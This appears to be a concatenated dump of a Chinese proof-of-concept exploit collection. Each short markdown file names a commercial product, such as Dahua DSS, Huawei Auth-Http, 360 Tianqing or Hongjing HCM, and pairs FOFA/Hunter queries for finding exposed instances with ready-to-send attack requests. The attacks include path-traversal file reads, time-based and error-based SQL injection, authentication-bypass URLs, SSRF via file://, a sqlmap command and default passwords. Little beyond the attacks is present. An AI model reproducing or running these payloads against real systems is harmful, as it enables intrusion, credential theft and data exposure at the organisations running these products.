2 | ## 华为Auth-Http Serve任意文件读取
3 | 华为Auth-Http服务,华为Auth-Http Server是一款安全认证服务器,在提供安全的远程登录和网络资源访问控制。支持多种认证方式和协议AAA、Radius、TACACS+等,可以实现用户身份认证、授权和审计等功能。同时,可广泛应用于企业、政府、教育等行业的安全架构中。华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件
4 | ## fofa
5 | ```
6 | server="Huawei Auth-Http Server 1.0"
7 | ```
8 |
9 | ## POC
10 | ```
11 | /umweb/shadow
12 | ```
13 |
14 | 
15 |
--------------------------------------------------------------------------------
/wpoc/华夏ERP/华夏ERPV3.3存在信息泄漏漏洞.md:
--------------------------------------------------------------------------------
1 | # 华夏ERPV3.3存在信息泄漏漏洞
2 |
3 | 华夏ERPV3.3存在信息泄漏漏洞,可获取用户敏感信息。
4 |
5 | ## hunter
6 |
7 | ```yaml
8 | web.icon=="f6efcd53ba2b07d67ab993073c238a11"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
17 |
18 | ```
19 |
20 |
21 |
22 | ## 漏洞来源
23 |
24 | - https://mp.weixin.qq.com/s/c12Frd6hp0a3r8A9-lVr-g
--------------------------------------------------------------------------------
/wpoc/华天动力/华天动力OA系统downloadWpsFile存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 华天动力OA系统downloadWpsFile存在任意文件读取漏洞
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="华天动力-OA8000"
9 | ```
10 |
11 |
12 | ## poc
13 |
14 | ```yaml
15 | GET /OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml HTTP/2
16 | Host:
17 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
18 | Accept-Encoding: gzip, deflate
19 | ```
20 |
21 |
--------------------------------------------------------------------------------
/wpoc/华测监测预警系统/华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞
2 |
3 | 华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞,通过读取配置文件获取重要数据。
4 |
5 | ## fofa
6 |
7 | ```jade
8 | app="华测监测预警系统2.2"
9 | ```
10 |
11 | ```javascript
12 | icon_hash="-628229493"
13 | ```
14 |
15 | ## poc
16 |
17 | ```javascript
18 | POST /Handler/FileDownLoad.ashx HTTP/1.1
19 | Host: ip:port
20 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
21 | Accept-Encoding: gzip, deflate
22 | Accept: */*
23 | Connection: close
24 | Content-Type: application/x-www-form-urlencoded
25 | Content-Length: 40
26 |
27 | filename=1&filepath=../../web.config
28 | ```
29 |
30 |
--------------------------------------------------------------------------------
/wpoc/华美卓软/卓软计量业务管理平台image.ashx任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 卓软计量业务管理平台image.ashx任意文件读取漏洞
2 |
3 | 卓软计量业务管理平台 image.ashx 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
4 |
5 | ## fofa
6 | ```javascript
7 | icon_hash="-334571363"
8 | ```
9 |
10 | ## poc
11 | ```javascript
12 | GET /HuameiMeasure/image.ashx?image_path=./../web.config HTTP/1.1
13 | Host:
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
15 | Accept-Encoding: gzip, deflate
16 | Connection: close
17 | ```
18 |
19 | 
--------------------------------------------------------------------------------
/wpoc/协达OA/协达OA系统绕过登录认证登陆后台.md:
--------------------------------------------------------------------------------
1 | ## 协达OA系统绕过登录认证登陆后台
2 |
3 | ## fofa
4 | ```
5 | body="/interface/CheckLoginName.jsp"
6 | ```
7 |
8 | ## poc
9 | ```
10 | http://ip/stylei/MainPage.jsp?token=YXR-YMD-SYQ-TOKEN
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/厦门四信通信科技有限公司/厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞.md:
--------------------------------------------------------------------------------
1 | ## 厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞
2 |
3 | 厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞,可直接绕过登录进入后台。
4 |
5 | ## fofa
6 |
7 | ```
8 | body="/monitor/realt/init?curPageId=a1"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | /mgrcter/usermgr/user/Login.action
15 | ```
16 |
17 | 
18 |
19 | 返回登录页面刷新一下进后台。
20 |
21 | 
--------------------------------------------------------------------------------
/wpoc/喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统listuser信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ## 喰星云-数字化餐饮服务系统listuser信息泄露漏洞
2 |
3 | 喰星云·数字化餐饮服务系统 listuser 接口处存在信息泄露漏洞,未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码登录凭证信息,导致后台权限被控,造成信息泄露,使系统处于极不安全的状态。
4 |
5 | ## fofa
6 |
7 | ```
8 | body="tmp_md5_pwd"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | GET /chainsales/head/user/listuser HTTP/1.1
15 | Host: your-ip
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
17 | Accept-Encoding: gzip, deflate
18 | Accept: */*
19 | Connection: keep-alive
20 | ```
21 |
22 | 
--------------------------------------------------------------------------------
/wpoc/喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞
2 |
3 | 喰星云·数字化餐饮服务系统 not_finish.php 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码登录凭证信息,导致后台权限被控,造成信息泄露,使系统处于极不安全的状态。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="tmp_md5_pwd"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /logistics/home_warning/php/not_finish.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6192=6193)+THEN+''+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
15 | Host: {{Hostname}}
16 | ```
17 |
18 |
--------------------------------------------------------------------------------
/wpoc/喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞
2 |
3 | 喰星云·数字化餐饮服务系统 shelflife.php 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码登录凭证信息,导致后台权限被控,造成信息泄露,使系统处于极不安全的状态。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="tmp_md5_pwd"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /logistics/home_warning/php/shelflife.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6191=6193)+THEN+%27%27+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
17 | ```
18 |
19 |
20 |
21 |
--------------------------------------------------------------------------------
/wpoc/喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞
2 |
3 | 喰星云·数字化餐饮服务系统 stock.php 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码登录凭证信息,导致后台权限被控,造成信息泄露,使系统处于极不安全的状态。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="tmp_md5_pwd"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /logistics/home_warning/php/stock.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6191=6193)+THEN+%27%27+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
17 | ```
18 |
19 |
20 |
21 |
--------------------------------------------------------------------------------
/wpoc/地大信息/地大信息-基础信息平台GetImg任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 地大信息-基础信息平台GetImg任意文件读取漏洞
2 |
3 | 地大信息-基础信息平台 GetImg 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取文件、数据库配置文件等等。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | body="/SystemManage/BaseProject" || title=="基础信息平台"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | GET /SystemManage/BaseProject/GetImg?path=C:\windows\win.ini HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
17 | Connection: close
18 | ```
19 |
20 | 
--------------------------------------------------------------------------------
/wpoc/多客圈子论坛系统/多客圈子论坛前台SSRF漏洞.md:
--------------------------------------------------------------------------------
1 | ## 多客圈子论坛前台SSRF漏洞
2 |
3 | /app/api/controller/Login.php 控制器中,httpGet方法存在curl_exec函数,且传参可控,导致任意文件读取+SSRF漏洞
4 |
5 | ## fofa
6 |
7 | ```
8 | "/static/index/js/jweixin-1.2.0.js"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | /index.php/api/login/httpGet?url=file:///etc/passwd
15 | ```
16 |
17 | 
18 |
19 | ## 漏洞来源
20 |
21 | - https://mp.weixin.qq.com/s/S12FdNBxJXyS8QXrEHOTfg
--------------------------------------------------------------------------------
/wpoc/大华/大华DSS数字监控系统attachment_clearTempFile.action存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 大华DSS数字监控系统attachment_clearTempFile.action存在SQL注入漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | http://ip/portal/attachment_clearTempFile.action?bean.RecId=1*&bean.TabName=1
7 | ```
8 |
--------------------------------------------------------------------------------
/wpoc/大华/大华DSS系统group_saveGroup存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 大华DSS系统group_saveGroup存在SQL注入漏洞
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="dahua-DSS"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | GET /emap/group_saveGroup?groupName=1'%20and%202333=2333%20and%20'hami'='hami&groupDesc=1 HTTP/1.1
15 | Host: xx.xx.xx.xx
16 | Accept-Encoding: identity
17 | Accept-Language: zh-CN,zh;q=0.8
18 | Accept: */*
19 | User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
20 | Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
21 | Connection: keep-alive
22 | Cache-Control: max-age=0
23 | ```
24 |
25 |
--------------------------------------------------------------------------------
/wpoc/大华/大华ICC智能物联综合管理平台heapdump敏感信息泄露.md:
--------------------------------------------------------------------------------
1 | # 大华ICC智能物联综合管理平台heapdump敏感信息泄露
2 |
3 | 大华ICC智能物联综合管理平台heapdump文件敏感信息泄露,可以获取账号和密码。
4 |
5 | ## fofa
6 |
7 | ```
8 | body="static/fontshd/font-hd.css" || body="客户端会小于800"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | /evo-apigw/dsc-mac/heapdump;.js
15 | /evo-apigw/dsc-mac/env;.js
16 | ```
17 |
18 |
19 |
20 | 
--------------------------------------------------------------------------------
/wpoc/大华/大华智慧园区综合管理平台 searchJson SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 大华智慧园区综合管理平台 searchJson SQL注入漏洞
2 |
3 | ## fofa
4 |
5 | ```javascript
6 | app="dahua-智慧园区综合管理平台"
7 | ```
8 |
9 | ## poc
10 |
11 | ```
12 | GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
13 | Host: 127.0.0.1:7443
14 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
15 | Accept-Encoding: gzip, deflate
16 | Connection: close
17 | ```
18 |
--------------------------------------------------------------------------------
/wpoc/大华/大华智慧园区综合管理平台-searchJson-SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 大华智慧园区综合管理平台 searchJson SQL注入漏洞
2 | ```
3 | GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
4 | Host: 127.0.0.1:7443
5 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 | Accept-Encoding: gzip, deflate
7 | Connection: close
8 | ```
9 |
--------------------------------------------------------------------------------
/wpoc/大华/大华智慧园区综合管理平台pageJson存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 大华智慧园区综合管理平台pageJson存在SQL注入漏洞
2 |
3 |
4 | ## fofa
5 | ```
6 | app="dahua-智慧园区综合管理平台"
7 | ```
8 |
9 | ## poc
10 | ```
11 | GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
12 | Host: 127.0.0.1
13 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
14 | Accept: */*
15 | Connection: Keep-Alive
16 | ```
17 |
--------------------------------------------------------------------------------
/wpoc/天擎/360 新天擎终端安全管理系统存在信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ## 360 新天擎终端安全管理系统存在信息泄露漏洞
2 | ```
3 | GET /runtime/admin_log_confcache
4 | ```
5 |
--------------------------------------------------------------------------------
/wpoc/天擎/360-新天擎终端安全管理系统存在信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ## 360 新天擎终端安全管理系统存在信息泄露漏洞
2 | ```
3 | GET /runtime/admin_log_confcache
4 | ```
5 |
--------------------------------------------------------------------------------
/wpoc/天擎/360天擎 - 未授权与sql注入.md:
--------------------------------------------------------------------------------
1 | ## 360天擎 - 未授权与sql注入
2 |
3 | ## FOFA语法
4 | ```title="360新天擎"```
5 |
6 |
7 | ## 鹰图
8 | ```web.title="360新天擎"&& ip.isp="教育"```
9 |
10 | ## 漏洞复现
11 |
12 | ### 未授权漏洞
13 | ```路由后拼接/api/dbstat/gettablessize```
14 | 
15 |
16 | ### sql注入漏洞
17 | 比较推荐的方式先测试是否存在数据库信息泄露,存在的话大概率存在SQL注入
18 | ```
19 | 路由后拼接/api/dp/rptsvcsyncpoint?ccid=1
20 |
21 | {{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
22 | ```
23 | 
24 |
25 | ## sqlmap
26 | python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1
27 |
--------------------------------------------------------------------------------
/wpoc/天擎/360天擎---未授权与sql注入.md:
--------------------------------------------------------------------------------
1 | ## 360天擎 - 未授权与sql注入
2 |
3 | ## FOFA语法
4 | ```title="360新天擎"```
5 |
6 |
7 | ## 鹰图
8 | ```web.title="360新天擎"&& ip.isp="教育"```
9 |
10 | ## 漏洞复现
11 |
12 | ### 未授权漏洞
13 | ```路由后拼接/api/dbstat/gettablessize```
14 | 
15 |
16 | ### sql注入漏洞
17 | 比较推荐的方式先测试是否存在数据库信息泄露,存在的话大概率存在SQL注入
18 | ```
19 | 路由后拼接/api/dp/rptsvcsyncpoint?ccid=1
20 |
21 | {{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
22 | ```
23 | 
24 |
25 | ## sqlmap
26 | python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1
27 |
--------------------------------------------------------------------------------
/wpoc/天擎/奇安信360天擎getsimilarlistSQL注入漏洞.md:
--------------------------------------------------------------------------------
1 |
2 | ## 奇安信360天擎getsimilarlistSQL注入漏洞
3 |
4 | ## fofa
5 | ```
6 | body="/task/index/detail?id={item.id}"
7 | title="360新天擎"
8 | ```
9 |
10 | ## POC
11 | ```
12 | GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1
13 | ```
14 |
--------------------------------------------------------------------------------
/wpoc/天擎/奇安信VPN任意用户密码重置.md:
--------------------------------------------------------------------------------
1 | ## 奇安信VPN任意用户密码重置
2 |
3 |
4 | ## 漏洞exp
5 | `https://github.com/adeljck/QAX_VPN_Crack`
6 |
--------------------------------------------------------------------------------
/wpoc/天问物业ERP系统/天问物业ERP系统docfileDownLoad.aspx存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 天问物业ERP系统docfileDownLoad.aspx存在任意文件读取漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | http://ip/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config
7 | ```
8 |
--------------------------------------------------------------------------------
/wpoc/天闻数媒名师工作室系统/天闻数媒名师工作室系统fileTempDownload任意文件读取.md:
--------------------------------------------------------------------------------
1 | # 天闻数媒名师工作室系统fileTempDownload任意文件读取
2 |
3 | # 一、漏洞简介
4 | 天闻数媒名师工作室系统fileTempDownload接口存在任意文件读取漏洞
5 |
6 | # 二、影响版本
7 | + 天闻数媒名师工作室系统
8 |
9 | # 三、资产测绘
10 | + fofa`body="/static/js/bootstrap/bootstrap.css" && title="名师工作室"`
11 |
12 | # 四、漏洞复现
13 | ```plain
14 | GET /fileUploadAndDownload/fileTempDownload?path=/etc/rsyslog.conf HTTP/1.1
15 | Host: 127.0.0.1:8080
16 | ```
17 |
--------------------------------------------------------------------------------
/wpoc/好视通视频会议系统/好视通视频会议系统 toDownload.do接口 任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 好视通视频会议系统 toDownload.do接口任意文件读取漏洞
2 | 好视通 是国内云视频会议知名品牌,拥有多项创新核心技术优势、多方通信服务牌照及行业全面资质 ,专注为政府、公检法司、教育、集团企业等用户提供“云+端+业务全场景”解决方案。其视频会议系统的路径(fastmeeting) /register/toDownload.do?fileName= 存在任意文件遍历漏洞,可通过fileName参数读取任意文件。
3 |
4 | 弱口令admin/admin
5 |
6 | ## fofa
7 | ```
8 | "深圳银澎云计算有限公司"
9 | ```
10 |
11 | ## poc
12 | ```
13 | /register/toDownload.do?fileName=敏感文件路径
14 | https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
15 |
16 | ```
17 |
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/好视通视频会议系统/好视通视频会议系统-toDownload.do接口-任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 好视通视频会议系统 toDownload.do接口任意文件读取漏洞
2 | 好视通 是国内云视频会议知名品牌,拥有多项创新核心技术优势、多方通信服务牌照及行业全面资质 ,专注为政府、公检法司、教育、集团企业等用户提供“云+端+业务全场景”解决方案。其视频会议系统的路径(fastmeeting) /register/toDownload.do?fileName= 存在任意文件遍历漏洞,可通过fileName参数读取任意文件。
3 |
4 | 弱口令admin/admin
5 |
6 | ## fofa
7 | ```
8 | "深圳银澎云计算有限公司"
9 | ```
10 |
11 | ## poc
12 | ```
13 | /register/toDownload.do?fileName=敏感文件路径
14 | https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
15 |
16 | ```
17 |
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/宏景OA/宏景 DisplayFiles任意文件读取.md:
--------------------------------------------------------------------------------
1 | ## 宏景DisplayFiles任意文件读取
2 |
3 | ## fofa
4 | ```
5 | app="HJSOFT-HCM"
6 | ```
7 |
8 | ## poc
9 | ```
10 | POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1
11 | Host:
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
13 | Content-Type: application/x-www-form-urlencoded
14 |
15 | filepath=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT
16 | ```
17 | 
18 |
19 | ### 加解密工具
20 | https://github.com/vaycore/HrmsTool
21 |
--------------------------------------------------------------------------------
/wpoc/宏景OA/宏景-DisplayFiles任意文件读取.md:
--------------------------------------------------------------------------------
1 | ## 宏景DisplayFiles任意文件读取
2 |
3 | ## fofa
4 | ```
5 | app="HJSOFT-HCM"
6 | ```
7 |
8 | ## poc
9 | ```
10 | POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1
11 | Host:
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
13 | Content-Type: application/x-www-form-urlencoded
14 |
15 | filepath=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT
16 | ```
17 | 
18 |
19 | ### 加解密工具
20 | https://github.com/vaycore/HrmsTool
21 |
--------------------------------------------------------------------------------
/wpoc/宏景OA/宏景HCM-codesettree接口存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 宏景HCM-codesettree接口存在SQL注入漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | GET /templates/attestation/../../servlet/codesettree?flag=3&codesetid=111';waitfor+delay+'0:0:2'--+&parentid=-1&fromflag=" HTTP/1.1
7 | Host:
8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
9 | Accept: */*
10 | Accept-Encoding: gzip, deflate
11 | Connection: close
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/wpoc/宏景OA/宏景HCM-downlawbase接口存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 宏景HCM-downlawbase接口存在SQL注入漏洞
2 |
3 |
4 |
5 | ## poc
6 | ```
7 | GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=11';waitfor+delay+'0:0:2'--+ HTTP/1.1
8 | Host:
9 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
10 | Accept: */*
11 | Accept-Encoding: gzip, deflate
12 | Connection: close
13 | ```
14 |
--------------------------------------------------------------------------------
/wpoc/宏景OA/宏景HCM系统fieldsettree接口存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 宏景HCM系统fieldsettree接口存在SQL注入漏洞
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```
8 | app="HJSOFT-HCM"
9 | ```
10 |
11 |
12 |
13 | ## poc
14 |
15 | ```
16 | GET /templates/attestation/../../servlet/fieldsettree?flag=2&infor=1';waitfor+delay+'0:0:3'+-- HTTP/1.1
17 | Host:
18 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
19 | ```
20 |
21 |
--------------------------------------------------------------------------------
/wpoc/宏景OA/宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | app="HJSOFT-HCM"
6 | ```
7 |
8 | ## poc
9 | ```
10 | POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
11 | Host:
12 | User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
13 | Content-Type: application/x-www-form-urlencoded
14 |
15 | filename=../webapps/ROOT/WEB-INF/web.xml
16 | ```
17 |
--------------------------------------------------------------------------------
/wpoc/宏脉医美行业管理系统/宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞.md:
--------------------------------------------------------------------------------
1 | # 宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞
2 |
3 | 宏脉医美行业管理系统是由宏脉信息技术(广州)股份有限公司开发的一款服务于医美行业管理服务的系统。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | title="宏脉医美行业管理系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | POST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1
15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
16 | Accept-Encoding: gzip, deflate
17 |
18 | filePath=c:\windows\win.ini
19 | ```
20 |
21 |
--------------------------------------------------------------------------------
/wpoc/帮管客CRM/帮管客CRM-jiliyu接口存在SQL漏洞.md:
--------------------------------------------------------------------------------
1 | ## 帮管客CRM-jiliyu接口存在SQL漏洞
2 |
3 | 帮管客CRM客户管理系统专注于为企业提供crm客户关系管理、crm管理系统、crm软件产品及企业销售管理流程解决方案服务,助力企业业绩增长。帮管客CRM jiliyu接口存在SQL漏洞
4 |
5 | ## fofa
6 | ```
7 | "帮管客-CRM"
8 | ```
9 |
10 | ## poc
11 | ```
12 | GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7f,(select%20md5(1)),0x7f),1)) HTTP/1.1
13 | Host: 127.0.0.1
14 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
15 | Accept: */*
16 | Connection: Keep-Alive
17 | ```
18 |
19 | 
20 |
--------------------------------------------------------------------------------
/wpoc/平升电子水库监管平台/平升水库水文监测系统默认密码.md:
--------------------------------------------------------------------------------
1 | ## 平升水库水文监测系统默认密码
2 |
3 | ## fofa
4 |
5 | ```
6 | body="js/PSExtend.js"
7 | ```
8 |
9 | ## poc
10 |
11 | ```
12 | Data86/Data86
13 | admin/123
14 | ```
15 |
16 | 
--------------------------------------------------------------------------------
/wpoc/建文工程管理系统/建文工程管理系统desktop.ashx存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 建文工程管理系统desktop.ashx存在SQL注入漏洞
2 |
3 | 建文工程管理系统`/SysFrame4/Desktop.ashx` 存在SQL注入漏洞
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="Login/QRLogin.ashx"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | POST /SysFrame4/Desktop.ashx HTTP/1.1
15 | Host:
16 | Content-Type: application/x-www-form-urlencoded
17 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
18 |
19 | account=1'+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','233')),3,32))<0--&method=isChangePwd&pwd=
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/微信公众号商家收银台小程序系统/微信公众号商家收银台小程序系统存在前台SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 微信公众号商家收银台小程序系统存在前台SQL注入漏洞
2 |
3 | 微信公众号商家收银台小程序系统存在前台SQL注入漏洞,/system/platform/controller/index.php 登录控制器中的api_login_check 方法,通过POST传入username,password,code 三个参数之后直接进入到SQL查询中,且未有任何过滤,导致漏洞产生。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | "/index.php?s=platform/index/captcha"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | 1' OR 1=1 OR '1'='1
15 | ```
16 |
17 | 
18 |
19 | 
--------------------------------------------------------------------------------
/wpoc/惠尔顿-网络安全审计系统/惠尔顿-网络安全审计系统存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 惠尔顿-网络安全审计系统存在任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | app="惠尔顿-网络安全审计系统"
6 | ```
7 | 
8 |
9 | ## poc
10 | ```
11 | GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
12 | Host: your-ip
